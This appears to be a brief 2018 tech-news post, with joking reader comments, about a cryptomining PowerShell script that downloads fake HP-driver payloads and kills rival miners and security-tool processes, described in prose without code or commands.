Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.
The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”
Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they're pretending to be HP drivers of some kind).
If successfully installed, the attack then lists running processes and kills any it doesn't like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.
Mertens wrote that the script also checks for processes associated with security tools.
(Score: 3, Informative) by Anonymous Coward on Wednesday March 07 2018, @08:02PM (2 children)
Microsoft calls that "gathering telemetry data".
(Score: 2) by frojack on Wednesday March 07 2018, @08:35PM (1 child)
I wonder how Microsoft has avoided being bombed by embedded malware in all the data they ex-filtrate during their telemetry data grab.
I mean all you have to do is watch any modern spy TV show to know that there's an edgy girl hacker (its always a girl) who could send them something that would infect their entire operation and let them look at the cameras in the elevators and stuff. All by putting a little code inside a text file somewhere in a windows machine and waiting for Microsoft to snatch it up.
No, you are mistaken. I've always had this sig.
(Score: 2) by maxwell demon on Thursday March 08 2018, @06:06AM
I guess simply by not trying to execute it.
The Tao of math: The numbers you can count are not the real numbers.